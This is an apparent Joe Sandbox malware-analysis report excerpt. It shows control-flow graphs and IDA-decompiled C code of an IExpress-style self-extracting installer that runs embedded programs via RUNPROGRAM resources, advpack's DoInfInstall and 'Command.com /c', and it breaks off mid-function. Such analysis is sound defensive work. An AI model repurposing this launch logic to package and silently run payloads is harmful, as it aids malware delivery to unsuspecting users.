                              control_flow_graph 36 a73ba2-a73bd9 37 a73bfd-a73bff 36->37 38 a73bdb-a73bee call a7468f 36->38 40 a73c03-a73c28 memset 37->40 44 a73bf4-a73bf7 38->44 45 a73d13-a73d30 call a744b9 38->45 42 a73d35-a73d48 call a71781 40->42 43 a73c2e-a73c40 call a7468f 40->43 49 a73d4d-a73d52 42->49 43->45 54 a73c46-a73c49 43->54 44->37 44->45 56 a73f4d 45->56 52 a73d54-a73d6c call a7468f 49->52 53 a73d9e-a73db6 call a71ae8 49->53 52->45 69 a73d6e-a73d75 52->69 53->56 67 a73dbc-a73dc2 53->67 54->45 58 a73c4f-a73c56 54->58 62 a73f4f-a73f63 call a76ce0 56->62 59 a73c60-a73c65 58->59 60 a73c58-a73c5e 58->60 65 a73c67-a73c6d 59->65 66 a73c75-a73c7c 59->66 64 a73c6e-a73c73 60->64 70 a73c87-a73c89 64->70 65->64 66->70 73 a73c7e-a73c82 66->73 71 a73de6-a73de8 67->71 72 a73dc4-a73dce 67->72 75 a73d7b-a73d98 CompareStringA 69->75 76 a73fda-a73fe1 69->76 70->49 78 a73c8f-a73c98 70->78 79 a73dee-a73df5 71->79 80 a73f0b-a73f15 call a73fef 71->80 72->71 77 a73dd0-a73dd7 72->77 73->70 75->53 75->76 81 a73fe3 call a72267 76->81 82 a73fe8-a73fea 76->82 77->71 84 a73dd9-a73ddb 77->84 85 a73cf1-a73cf3 78->85 86 a73c9a-a73c9c 78->86 87 a73fab-a73fd2 call a744b9 LocalFree 79->87 88 a73dfb-a73dfd 79->88 91 a73f1a-a73f1c 80->91 81->82 82->62 84->79 92 a73ddd-a73de1 call a7202a 84->92 85->53 90 a73cf9-a73d11 call a7468f 85->90 94 a73ca5-a73ca7 86->94 95 a73c9e-a73ca3 86->95 87->56 88->80 96 a73e03-a73e0a 88->96 90->45 90->49 98 a73f46-a73f47 LocalFree 91->98 99 a73f1e-a73f2d LocalFree 91->99 92->71 94->56 103 a73cad 94->103 102 a73cb2-a73cc5 call a7468f 95->102 96->80 104 a73e10-a73e19 call a76495 96->104 98->56 106 a73fd7-a73fd9 99->106 107 a73f33-a73f3b 99->107 102->45 114 a73cc7-a73ce8 CompareStringA 102->114 103->102 112 a73f92-a73fa9 call a744b9 104->112 113 a73e1f-a73e36 GetProcAddress 104->113 106->76 107->40 126 a73f7c-a73f90 LocalFree call a76285 112->126 116 a73f64-a73f76 call a744b9 FreeLibrary 113->116 117 a73e3c-a73e80 113->117 114->85 115 a73cea-a73ced 114->115 115->85 116->126 119 a73e82-a73e87 117->119 120 a73e8b-a73e94 117->120 119->120 124 a73e96-a73e9b 120->124 125 a73e9f-a73ea2 120->125 124->125 128 a73ea4-a73ea9 125->128 129 a73ead-a73eb6 125->129 126->56 128->129 131 a73ec1-a73ec3 129->131 132 a73eb8-a73ebd 129->132 133 a73ec5-a73eca 131->133 134 a73ece-a73eec 131->134 132->131 133->134 137 a73ef5-a73efd 134->137 138 a73eee-a73ef3 134->138 139 a73f40 FreeLibrary 137->139 140 a73eff-a73f09 FreeLibrary 137->140 138->137 139->98 140->99
                              C-Code - Quality: 82%
                              			E00A73BA2() {
                              				signed int _v8;
                              				signed int _v12;
                              				char _v276;
                              				char _v280;
                              				short _v300;
                              				intOrPtr _v304;
                              				void _v348;
                              				char _v352;
                              				intOrPtr _v356;
                              				signed int _v360;
                              				short _v364;
                              				char* _v368;
                              				intOrPtr _v372;
                              				void* _v376;
                              				intOrPtr _v380;
                              				char _v384;
                              				signed int _v388;
                              				intOrPtr _v392;
                              				signed int _v396;
                              				signed int _v400;
                              				signed int _v404;
                              				void* _v408;
                              				void* _v424;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t69;
                              				signed int _t76;
                              				void* _t77;
                              				signed int _t79;
                              				short _t96;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				signed int _t101;
                              				signed int _t104;
                              				signed int _t108;
                              				int _t112;
                              				void* _t115;
                              				signed char _t118;
                              				void* _t125;
                              				signed int _t127;
                              				void* _t128;
                              				struct HINSTANCE__* _t129;
                              				void* _t130;
                              				short _t137;
                              				char* _t140;
                              				signed char _t144;
                              				signed char _t145;
                              				signed int _t149;
                              				void* _t150;
                              				void* _t151;
                              				signed int _t153;
                              				void* _t155;
                              				void* _t156;
                              				signed int _t157;
                              				signed int _t162;
                              				signed int _t164;
                              				void* _t165;
                              
                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                              				_t69 =  *0xa78004; // 0x74742267
                              				_v8 = _t69 ^ _t164;
                              				_t153 = 0;
                              				 *0xa79124 =  *0xa79124 & 0;
                              				_t149 = 0;
                              				_v388 = 0;
                              				_v384 = 0;
                              				_t165 =  *0xa78a28 - _t153; // 0x0
                              				if(_t165 != 0) {
                              					L3:
                              					_t127 = 0;
                              					_v392 = 0;
                              					while(1) {
                              						_v400 = _v400 & 0x00000000;
                              						memset( &_v348, 0, 0x44);
                              						_t164 = _t164 + 0xc;
                              						_v348 = 0x44;
                              						if( *0xa78c42 != 0) {
                              							goto L26;
                              						}
                              						_t146 =  &_v396;
                              						_t115 = E00A7468F("SHOWWINDOW",  &_v396, 4);
                              						if(_t115 == 0 || _t115 > 4) {
                              							L25:
                              							_t146 = 0x4b1;
                              							E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              							 *0xa79124 = 0x80070714;
                              							goto L62;
                              						} else {
                              							if(_v396 != 1) {
                              								__eflags = _v396 - 2;
                              								if(_v396 != 2) {
                              									_t137 = 3;
                              									__eflags = _v396 - _t137;
                              									if(_v396 == _t137) {
                              										_v304 = 1;
                              										_v300 = _t137;
                              									}
                              									goto L14;
                              								}
                              								_push(6);
                              								_v304 = 1;
                              								_pop(0);
                              								goto L11;
                              							} else {
                              								_v304 = 1;
                              								L11:
                              								_v300 = 0;
                              								L14:
                              								if(_t127 != 0) {
                              									L27:
                              									_t155 = 1;
                              									__eflags = _t127 - 1;
                              									if(_t127 != 1) {
                              										L31:
                              										_t132 =  &_v280;
                              										_t76 = E00A71AE8( &_v280,  &_v408,  &_v404); // executed
                              										__eflags = _t76;
                              										if(_t76 == 0) {
                              											L62:
                              											_t77 = 0;
                              											L63:
                              											_pop(_t150);
                              											_pop(_t156);
                              											_pop(_t128);
                              											return E00A76CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                              										}
                              										_t157 = _v404;
                              										__eflags = _t149;
                              										if(_t149 != 0) {
                              											L37:
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												L57:
                              												_t151 = _v408;
                              												_t146 =  &_v352;
                              												_t130 = _t151; // executed
                              												_t79 = E00A73FEF(_t130,  &_v352); // executed
                              												__eflags = _t79;
                              												if(_t79 == 0) {
                              													L61:
                              													LocalFree(_t151);
                              													goto L62;
                              												}
                              												L58:
                              												LocalFree(_t151);
                              												_t127 = _t127 + 1;
                              												_v396 = _t127;
                              												__eflags = _t127 - 2;
                              												if(_t127 >= 2) {
                              													_t155 = 1;
                              													__eflags = 1;
                              													L69:
                              													__eflags =  *0xa78580;
                              													if( *0xa78580 != 0) {
                              														E00A72267();
                              													}
                              													_t77 = _t155;
                              													goto L63;
                              												}
                              												_t153 = _v392;
                              												_t149 = _v388;
                              												continue;
                              											}
                              											L38:
                              											__eflags =  *0xa78180;
                              											if( *0xa78180 == 0) {
                              												_t146 = 0x4c7;
                              												E00A744B9(0, 0x4c7, 0, 0, 0x10, 0);
                              												LocalFree(_v424);
                              												 *0xa79124 = 0x8007042b;
                              												goto L62;
                              											}
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												goto L57;
                              											}
                              											__eflags =  *0xa79a34 & 0x00000004;
                              											if(__eflags == 0) {
                              												goto L57;
                              											}
                              											_t129 = E00A76495(_t127, _t132, _t157, __eflags);
                              											__eflags = _t129;
                              											if(_t129 == 0) {
                              												_t146 = 0x4c8;
                              												E00A744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                              												L65:
                              												LocalFree(_v408);
                              												 *0xa79124 = E00A76285();
                              												goto L62;
                              											}
                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                              											_v404 = _t146;
                              											__eflags = _t146;
                              											if(_t146 == 0) {
                              												_t146 = 0x4c9;
                              												__eflags = 0;
                              												E00A744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                              												FreeLibrary(_t129);
                              												goto L65;
                              											}
                              											__eflags =  *0xa78a30;
                              											_t151 = _v408;
                              											_v384 = 0;
                              											_v368 =  &_v280;
                              											_t96 =  *0xa79a40; // 0x3
                              											_v364 = _t96;
                              											_t97 =  *0xa78a38 & 0x0000ffff;
                              											_v380 = 0xa79154;
                              											_v376 = _t151;
                              											_v372 = 0xa791e4;
                              											_v360 = _t97;
                              											if( *0xa78a30 != 0) {
                              												_t97 = _t97 | 0x00010000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t144 =  *0xa79a34; // 0x1
                              											__eflags = _t144 & 0x00000008;
                              											if((_t144 & 0x00000008) != 0) {
                              												_t97 = _t97 | 0x00020000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t144 & 0x00000010;
                              											if((_t144 & 0x00000010) != 0) {
                              												_t97 = _t97 | 0x00040000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t145 =  *0xa78d48; // 0x0
                              											__eflags = _t145 & 0x00000040;
                              											if((_t145 & 0x00000040) != 0) {
                              												_t97 = _t97 | 0x00080000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t145;
                              											if(_t145 < 0) {
                              												_t104 = _t97 | 0x00100000;
                              												__eflags = _t104;
                              												_v360 = _t104;
                              											}
                              											_t98 =  *0xa79a38; // 0x0
                              											_v356 = _t98;
                              											_t130 = _t146;
                              											 *0xa7a288( &_v384);
                              											_t101 = _v404();
                              											__eflags = _t164 - _t164;
                              											if(_t164 != _t164) {
                              												_t130 = 4;
                              												asm("int 0x29");
                              											}
                              											 *0xa79124 = _t101;
                              											_push(_t129);
                              											__eflags = _t101;
                              											if(_t101 < 0) {
                              												FreeLibrary();
                              												goto L61;
                              											} else {
                              												FreeLibrary();
                              												_t127 = _v400;
                              												goto L58;
                              											}
                              										}
                              										__eflags =  *0xa79a40 - 1; // 0x3
                              										if(__eflags == 0) {
                              											goto L37;
                              										}
                              										__eflags =  *0xa78a20;
                              										if( *0xa78a20 == 0) {
                              											goto L37;
                              										}
                              										__eflags = _t157;
                              										if(_t157 != 0) {
                              											goto L38;
                              										}
                              										_v388 = 1;
                              										E00A7202A(_t146); // executed
                              										goto L37;
                              									}
                              									_t146 =  &_v280;
                              									_t108 = E00A7468F("POSTRUNPROGRAM",  &_v280, 0x104);
                              									__eflags = _t108;
                              									if(_t108 == 0) {
                              										goto L25;
                              									}
                              									__eflags =  *0xa78c42;
                              									if( *0xa78c42 != 0) {
                              										goto L69;
                              									}
                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                              									__eflags = _t112 == 0;
                              									if(_t112 == 0) {
                              										goto L69;
                              									}
                              									goto L31;
                              								}
                              								_t118 =  *0xa78a38; // 0x0
                              								if(_t118 == 0) {
                              									L23:
                              									if(_t153 != 0) {
                              										goto L31;
                              									}
                              									_t146 =  &_v276;
                              									if(E00A7468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                              										goto L27;
                              									}
                              									goto L25;
                              								}
                              								if((_t118 & 0x00000001) == 0) {
                              									__eflags = _t118 & 0x00000002;
                              									if((_t118 & 0x00000002) == 0) {
                              										goto L62;
                              									}
                              									_t140 = "USRQCMD";
                              									L20:
                              									_t146 =  &_v276;
                              									if(E00A7468F(_t140,  &_v276, 0x104) == 0) {
                              										goto L25;
                              									}
                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                              										_t153 = 1;
                              										_v388 = 1;
                              									}
                              									goto L23;
                              								}
                              								_t140 = "ADMQCMD";
                              								goto L20;
                              							}
                              						}
                              						L26:
                              						_push(_t130);
                              						_t146 = 0x104;
                              						E00A71781( &_v276, 0x104, _t130, 0xa78c42);
                              						goto L27;
                              					}
                              				}
                              				_t130 = "REBOOT";
                              				_t125 = E00A7468F(_t130, 0xa79a2c, 4);
                              				if(_t125 == 0 || _t125 > 4) {
                              					goto L25;
                              				} else {
                              					goto L3;
                              				}
                              			}





























































                              0x00a73baa
                              0x00a73bb0
                              0x00a73bb7
                              0x00a73bc0
                              0x00a73bc2
                              0x00a73bc9
                              0x00a73bcb
                              0x00a73bcf
                              0x00a73bd3
                              0x00a73bd9
                              0x00a73bfd
                              0x00a73bfd
                              0x00a73bff
                              0x00a73c03
                              0x00a73c03
                              0x00a73c11
                              0x00a73c16
                              0x00a73c19
                              0x00a73c28
                              0x00000000
                              0x00000000
                              0x00a73c30
                              0x00a73c39
                              0x00a73c40
                              0x00a73d13
                              0x00a73d15
                              0x00a73d21
                              0x00a73d26
                              0x00000000
                              0x00a73c4f
                              0x00a73c56
                              0x00a73c60
                              0x00a73c65
                              0x00a73c77
                              0x00a73c78
                              0x00a73c7c
                              0x00a73c7e
                              0x00a73c82
                              0x00a73c82
                              0x00000000
                              0x00a73c7c
                              0x00a73c67
                              0x00a73c69
                              0x00a73c6d
                              0x00000000
                              0x00a73c58
                              0x00a73c58
                              0x00a73c6e
                              0x00a73c6e
                              0x00a73c87
                              0x00a73c89
                              0x00a73d4d
                              0x00a73d4f
                              0x00a73d50
                              0x00a73d52
                              0x00a73d9e
                              0x00a73da8
                              0x00a73daf
                              0x00a73db4
                              0x00a73db6
                              0x00a73f4d
                              0x00a73f4d
                              0x00a73f4f
                              0x00a73f56
                              0x00a73f57
                              0x00a73f58
                              0x00a73f63
                              0x00a73f63
                              0x00a73dbc
                              0x00a73dc0
                              0x00a73dc2
                              0x00a73de6
                              0x00a73de6
                              0x00a73de8
                              0x00a73f0b
                              0x00a73f0b
                              0x00a73f0f
                              0x00a73f13
                              0x00a73f15
                              0x00a73f1a
                              0x00a73f1c
                              0x00a73f46
                              0x00a73f47
                              0x00000000
                              0x00a73f47
                              0x00a73f1e
                              0x00a73f1f
                              0x00a73f25
                              0x00a73f26
                              0x00a73f2a
                              0x00a73f2d
                              0x00a73fd9
                              0x00a73fd9
                              0x00a73fda
                              0x00a73fda
                              0x00a73fe1
                              0x00a73fe3
                              0x00a73fe3
                              0x00a73fe8
                              0x00000000
                              0x00a73fe8
                              0x00a73f33
                              0x00a73f37
                              0x00000000
                              0x00a73f37
                              0x00a73dee
                              0x00a73dee
                              0x00a73df5
                              0x00a73fad
                              0x00a73fb9
                              0x00a73fc2
                              0x00a73fc8
                              0x00000000
                              0x00a73fc8
                              0x00a73dfb
                              0x00a73dfd
                              0x00000000
                              0x00000000
                              0x00a73e03
                              0x00a73e0a
                              0x00000000
                              0x00000000
                              0x00a73e15
                              0x00a73e17
                              0x00a73e19
                              0x00a73f94
                              0x00a73fa4
                              0x00a73f7c
                              0x00a73f80
                              0x00a73f8b
                              0x00000000
                              0x00a73f8b
                              0x00a73e2c
                              0x00a73e30
                              0x00a73e34
                              0x00a73e36
                              0x00a73f69
                              0x00a73f6e
                              0x00a73f70
                              0x00a73f76
                              0x00000000
                              0x00a73f76
                              0x00a73e3c
                              0x00a73e43
                              0x00a73e47
                              0x00a73e52
                              0x00a73e56
                              0x00a73e5c
                              0x00a73e61
                              0x00a73e68
                              0x00a73e70
                              0x00a73e74
                              0x00a73e7c
                              0x00a73e80
                              0x00a73e82
                              0x00a73e82
                              0x00a73e87
                              0x00a73e87
                              0x00a73e8b
                              0x00a73e91
                              0x00a73e94
                              0x00a73e96
                              0x00a73e96
                              0x00a73e9b
                              0x00a73e9b
                              0x00a73e9f
                              0x00a73ea2
                              0x00a73ea4
                              0x00a73ea4
                              0x00a73ea9
                              0x00a73ea9
                              0x00a73ead
                              0x00a73eb3
                              0x00a73eb6
                              0x00a73eb8
                              0x00a73eb8
                              0x00a73ebd
                              0x00a73ebd
                              0x00a73ec1
                              0x00a73ec3
                              0x00a73ec5
                              0x00a73ec5
                              0x00a73eca
                              0x00a73eca
                              0x00a73ece
                              0x00a73ed5
                              0x00a73ed9
                              0x00a73ee0
                              0x00a73ee6
                              0x00a73eea
                              0x00a73eec
                              0x00a73eee
                              0x00a73ef3
                              0x00a73ef3
                              0x00a73ef5
                              0x00a73efa
                              0x00a73efb
                              0x00a73efd
                              0x00a73f40
                              0x00000000
                              0x00a73eff
                              0x00a73eff
                              0x00a73f05
                              0x00000000
                              0x00a73f05
                              0x00a73efd
                              0x00a73dc7
                              0x00a73dce
                              0x00000000
                              0x00000000
                              0x00a73dd0
                              0x00a73dd7
                              0x00000000
                              0x00000000
                              0x00a73dd9
                              0x00a73ddb
                              0x00000000
                              0x00000000
                              0x00a73ddd
                              0x00a73de1
                              0x00000000
                              0x00a73de1
                              0x00a73d59
                              0x00a73d65
                              0x00a73d6a
                              0x00a73d6c
                              0x00000000
                              0x00000000
                              0x00a73d6e
                              0x00a73d75
                              0x00000000
                              0x00000000
                              0x00a73d8f
                              0x00a73d96
                              0x00a73d98
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73d98
                              0x00a73c8f
                              0x00a73c98
                              0x00a73cf1
                              0x00a73cf3
                              0x00000000
                              0x00000000
                              0x00a73cfe
                              0x00a73d11
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73d11
                              0x00a73c9c
                              0x00a73ca5
                              0x00a73ca7
                              0x00000000
                              0x00000000
                              0x00a73cad
                              0x00a73cb2
                              0x00a73cb7
                              0x00a73cc5
                              0x00000000
                              0x00000000
                              0x00a73ce8
                              0x00a73cec
                              0x00a73ced
                              0x00a73ced
                              0x00000000
                              0x00a73ce8
                              0x00a73c9e
                              0x00000000
                              0x00a73c9e
                              0x00a73c56
                              0x00a73d35
                              0x00a73d35
                              0x00a73d3c
                              0x00a73d48
                              0x00000000
                              0x00a73d48
                              0x00a73c03
                              0x00a73be2
                              0x00a73be7
                              0x00a73bee
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • memset.MSVCRT ref: 00A73C11
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A73CDC
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A78C42), ref: 00A73D8F
                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A73E26
                              • FreeLibrary.KERNEL32(00000000,?,00A78C42), ref: 00A73EFF
                              • LocalFree.KERNEL32(?,?,?,?,00A78C42), ref: 00A73F1F
                              • FreeLibrary.KERNEL32(00000000,?,00A78C42), ref: 00A73F40
                              • LocalFree.KERNEL32(?,?,?,?,00A78C42), ref: 00A73F47
                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A78C42), ref: 00A73F76
                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A78C42), ref: 00A73F80
                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A78C42), ref: 00A73FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                              • API String ID: 1032054927-139961720
                              • Opcode ID: 9de18a3654e0f3e8c4d8df1b8cd782f225b4fa145c6522ba80966af28bbe9e28
                              • Instruction ID: d15ad61627e4ffc6d1af379162ac8928ead3c16bba6aeb1c63fe9f44e17f8721
                              • Opcode Fuzzy Hash: 9de18a3654e0f3e8c4d8df1b8cd782f225b4fa145c6522ba80966af28bbe9e28
                              • Instruction Fuzzy Hash: B2B124726083019BDB30DF648D45B6B77E8EB84740F02C92EFA8DD6191DB74C986DB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 141 a71ae8-a71b2c call a71680 144 a71b2e-a71b39 141->144 145 a71b3b-a71b40 141->145 146 a71b46-a71b61 call a71a84 144->146 145->146 149 a71b63-a71b65 146->149 150 a71b9f-a71bc2 call a71781 call a7658a 146->150 152 a71b68-a71b6d 149->152 157 a71bc7-a71bd3 call a766c8 150->157 152->152 154 a71b6f-a71b74 152->154 154->150 156 a71b76-a71b7b 154->156 158 a71b83-a71b86 156->158 159 a71b7d-a71b81 156->159 166 a71d73-a71d7f call a766c8 157->166 167 a71bd9-a71bf1 CompareStringA 157->167 158->150 162 a71b88-a71b8a 158->162 159->158 161 a71b8c-a71b9d call a71680 159->161 161->157 162->150 162->161 175 a71d81-a71d99 CompareStringA 166->175 176 a71df8-a71e09 LocalAlloc 166->176 167->166 168 a71bf7-a71c07 GetFileAttributesA 167->168 170 a71d53-a71d5e 168->170 171 a71c0d-a71c15 168->171 173 a71d64-a71d6e call a744b9 170->173 171->170 174 a71c1b-a71c33 call a71a84 171->174 189 a71e94-a71ea4 call a76ce0 173->189 191 a71c35-a71c38 174->191 192 a71c50-a71c61 LocalAlloc 174->192 175->176 181 a71d9b-a71da2 175->181 178 a71dd4-a71ddf 176->178 179 a71e0b-a71e1b GetFileAttributesA 176->179 178->173 183 a71e67-a71e73 call a71680 179->183 184 a71e1d-a71e1f 179->184 186 a71da5-a71daa 181->186 197 a71e78-a71e84 call a72aac 183->197 184->183 190 a71e21-a71e3e call a71781 184->190 186->186 187 a71dac-a71db4 186->187 195 a71db7-a71dbc 187->195 190->197 211 a71e40-a71e43 190->211 193 a71c40-a71c4b call a71a84 191->193 194 a71c3a 191->194 192->178 196 a71c67-a71c72 192->196 193->192 194->193 195->195 201 a71dbe-a71dd2 LocalAlloc 195->201 202 a71c74 196->202 203 a71c79-a71cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 a71e89-a71e92 197->210 201->178 207 a71de1-a71df3 call a7171e 201->207 202->203 208 a71cc2-a71ccc 203->208 209 a71cf8-a71d07 203->209 207->210 213 a71cd3-a71cf3 call a71680 * 2 208->213 214 a71cce 208->214 216 a71d23 209->216 217 a71d09-a71d21 GetShortPathNameA 209->217 210->189 211->197 215 a71e45-a71e65 call a716b3 * 2 211->215 213->210 214->213 215->197 218 a71d28-a71d2b 216->218 217->218 223 a71d32-a71d4e call a7171e 218->223 224 a71d2d 218->224 223->210 224->223
                              C-Code - Quality: 82%
                              			E00A71AE8(long __ecx, CHAR** _a4, int* _a8) {
                              				signed int _v8;
                              				char _v268;
                              				char _v527;
                              				char _v528;
                              				char _v1552;
                              				CHAR* _v1556;
                              				int* _v1560;
                              				CHAR** _v1564;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t48;
                              				CHAR* _t53;
                              				CHAR* _t54;
                              				char* _t57;
                              				char* _t58;
                              				CHAR* _t60;
                              				void* _t62;
                              				signed char _t65;
                              				intOrPtr _t76;
                              				intOrPtr _t77;
                              				unsigned int _t85;
                              				CHAR* _t90;
                              				CHAR* _t92;
                              				char _t105;
                              				char _t106;
                              				CHAR** _t111;
                              				CHAR* _t115;
                              				intOrPtr* _t125;
                              				void* _t126;
                              				CHAR* _t132;
                              				CHAR* _t135;
                              				void* _t138;
                              				void* _t139;
                              				void* _t145;
                              				intOrPtr* _t146;
                              				char* _t148;
                              				CHAR* _t151;
                              				void* _t152;
                              				CHAR* _t155;
                              				CHAR* _t156;
                              				void* _t157;
                              				signed int _t158;
                              
                              				_t48 =  *0xa78004; // 0x74742267
                              				_v8 = _t48 ^ _t158;
                              				_t108 = __ecx;
                              				_v1564 = _a4;
                              				_v1560 = _a8;
                              				E00A71680( &_v528, 0x104, __ecx);
                              				if(_v528 != 0x22) {
                              					_t135 = " ";
                              					_t53 =  &_v528;
                              				} else {
                              					_t135 = "\"";
                              					_t53 =  &_v527;
                              				}
                              				_t111 =  &_v1556;
                              				_v1556 = _t53;
                              				_t54 = E00A71A84(_t111, _t135);
                              				_t156 = _v1556;
                              				_t151 = _t54;
                              				if(_t156 == 0) {
                              					L12:
                              					_push(_t111);
                              					E00A71781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              					E00A7658A( &_v268, 0x104, _t156);
                              					goto L13;
                              				} else {
                              					_t132 = _t156;
                              					_t148 =  &(_t132[1]);
                              					do {
                              						_t105 =  *_t132;
                              						_t132 =  &(_t132[1]);
                              					} while (_t105 != 0);
                              					_t111 = _t132 - _t148;
                              					if(_t111 < 3) {
                              						goto L12;
                              					}
                              					_t106 = _t156[1];
                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                              							goto L12;
                              						} else {
                              							goto L11;
                              						}
                              					} else {
                              						L11:
                              						E00A71680( &_v268, 0x104, _t156);
                              						L13:
                              						_t138 = 0x2e;
                              						_t57 = E00A766C8(_t156, _t138);
                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                              							_t139 = 0x2e;
                              							_t115 = _t156;
                              							_t58 = E00A766C8(_t115, _t139);
                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                              								_t156 = LocalAlloc(0x40, 0x400);
                              								if(_t156 == 0) {
                              									goto L43;
                              								}
                              								_t65 = GetFileAttributesA( &_v268); // executed
                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                              									E00A71680( &_v1552, 0x400, _t108);
                              								} else {
                              									_push(_t115);
                              									_t108 = 0x400;
                              									E00A71781( &_v1552, 0x400, _t115,  &_v268);
                              									if(_t151 != 0 &&  *_t151 != 0) {
                              										E00A716B3( &_v1552, 0x400, " ");
                              										E00A716B3( &_v1552, 0x400, _t151);
                              									}
                              								}
                              								_t140 = _t156;
                              								 *_t156 = 0;
                              								E00A72AAC( &_v1552, _t156, _t156);
                              								goto L53;
                              							} else {
                              								_t108 = "Command.com /c %s";
                              								_t125 = "Command.com /c %s";
                              								_t145 = _t125 + 1;
                              								do {
                              									_t76 =  *_t125;
                              									_t125 = _t125 + 1;
                              								} while (_t76 != 0);
                              								_t126 = _t125 - _t145;
                              								_t146 =  &_v268;
                              								_t157 = _t146 + 1;
                              								do {
                              									_t77 =  *_t146;
                              									_t146 = _t146 + 1;
                              								} while (_t77 != 0);
                              								_t140 = _t146 - _t157;
                              								_t154 = _t126 + 8 + _t146 - _t157;
                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                              								if(_t156 != 0) {
                              									E00A7171E(_t156, _t154, "Command.com /c %s",  &_v268);
                              									goto L53;
                              								}
                              								goto L43;
                              							}
                              						} else {
                              							_t85 = GetFileAttributesA( &_v268);
                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                              								_t140 = 0x525;
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_t60 =  &_v268;
                              								goto L35;
                              							} else {
                              								_t140 = "[";
                              								_v1556 = _t151;
                              								_t90 = E00A71A84( &_v1556, "[");
                              								if(_t90 != 0) {
                              									if( *_t90 != 0) {
                              										_v1556 = _t90;
                              									}
                              									_t140 = "]";
                              									E00A71A84( &_v1556, "]");
                              								}
                              								_t156 = LocalAlloc(0x40, 0x200);
                              								if(_t156 == 0) {
                              									L43:
                              									_t60 = 0;
                              									_t140 = 0x4b5;
                              									_push(0);
                              									_push(0x10);
                              									_push(0);
                              									L35:
                              									_push(_t60);
                              									E00A744B9(0, _t140);
                              									_t62 = 0;
                              									goto L54;
                              								} else {
                              									_t155 = _v1556;
                              									_t92 = _t155;
                              									if( *_t155 == 0) {
                              										_t92 = "DefaultInstall";
                              									}
                              									 *0xa79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                              									 *_v1560 = 1;
